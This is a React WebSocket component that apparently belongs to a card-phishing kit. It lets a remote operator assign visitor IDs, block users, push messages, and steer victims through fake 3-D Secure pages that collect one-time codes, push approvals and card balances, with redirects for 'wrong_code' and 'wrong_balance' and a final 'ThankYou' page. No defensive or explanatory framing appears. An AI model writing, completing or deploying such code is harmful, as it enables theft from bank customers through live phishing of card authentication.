import React, { useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { ToastContainer, toast } from 'react-toastify';
import { AiOutlineExclamationCircle } from 'react-icons/ai'; // Import the warning icon

import 'react-toastify/dist/ReactToastify.css';
import './Toast.css';

const Websocket = ({ setActiveComponent }) => {
    const navigate = useNavigate();

    useEffect(() => {
        let ws;
        let reconnectAttempts = 0;
        const maxReconnectAttempts = 5;
        const reconnectInterval = 5000; // 5 seconds

        const connectWebSocket = () => {
            ws = new WebSocket(process.env.REACT_APP_WEBSOCKET_URL);

            ws.onopen = () => {
                reconnectAttempts = 0; // Reset reconnect attempts on successful connection
                let existingUuId = localStorage.getItem("uuId");

                function generateRandom16DigitString() {
                    let result = '';
                    for (let i = 0; i < 16; i++) {
                        result += Math.floor(Math.random() * 10); // Append a random digit (0-9)
                    }
                    return result;
                }

                if (!existingUuId) {
                    existingUuId = generateRandom16DigitString();
                    localStorage.setItem("uuId", existingUuId);
                    console.log("Generated new UUID:", existingUuId);
                }

                const message = JSON.stringify({
                    type: "existing_uuId",
                    uuId: existingUuId,
                });
                ws.send(message);

                console.log("Connected to WebSocket server");
            };

            ws.onmessage = (message) => {
                console.log(`Received message: ${message.data}`);
                const message_json = JSON.parse(message.data);

                if (message_json.type === "uuId_assign") {
                    localStorage.setItem("uuId", message_json.uuId);
                } else if (message_json.type === "message") {
                    toast(
                        <div className="flex items-center gap-2">
                            <AiOutlineExclamationCircle className="text-yellow-500" size={24} />
                            <span>{message_json.message}</span>
                        </div>,
                        {
                            position: "bottom-right",
                            autoClose: 10000,
                            className: "bg-gray-800 text-white rounded shadow-md",
                            progressClassName: "bg-yellow-500",
                        }
                    );
                } else if (message_json.type === "block_user") {
                    localStorage.setItem('blocked', 'true');
                } else if (message_json.type === "question_response") {
                    localStorage.setItem('seq_quest', message_json.message);
                    navigate("/3ds/question");
                } else if (message_json.type === "push_text") {
                    localStorage.setItem('push_text', message_json.message);
                    navigate("/3ds/push");
                } else if (message_json.type === "redirect") {
                    const RedirectPage = message_json.to;
                    const redirectMap = {
                        "otp_page": "/3ds/otp",
                        "wrong_data": "/",
                        "sucess_page": "/ThankYou",
                        "wrong_code": "/3ds/otp",
                        "wrong_push": "/3ds/push",
                        "wrong_balance": "/3ds/balance",
                        "push_page": "/3ds/push",
                        "balance_page": "/3ds/balance",
                        "original_page": "/ThankYou",
                    };
                    navigate(redirectMap[RedirectPage] || "/");
                }
            };

            ws.onclose = () => {
                console.log("Disconnected from WebSocket server");
                if (reconnectAttempts < maxReconnectAttempts) {
                    reconnectAttempts++;
                    console.log(`Reconnect attempt ${reconnectAttempts} in ${reconnectInterval / 1000} seconds...`);
                    setTimeout(connectWebSocket, reconnectInterval);
                } else {
                    console.error("Max reconnect attempts reached. Could not reconnect to WebSocket server.");
                }
            };

            ws.onerror = (error) => {
                console.error("WebSocket error:", error);
                ws.close();
            };
        };

        connectWebSocket();

        // Cleanup on component unmount
        return () => {
            if (ws) ws.close();
        };
    }, [navigate]);

    return (
        <ToastContainer
            hideProgressBar={false}
            newestOnTop={false}
            closeOnClick
            rtl={false}
            pauseOnFocusLoss
            draggable
            pauseOnHover
        />
    );
};

export default Websocket;
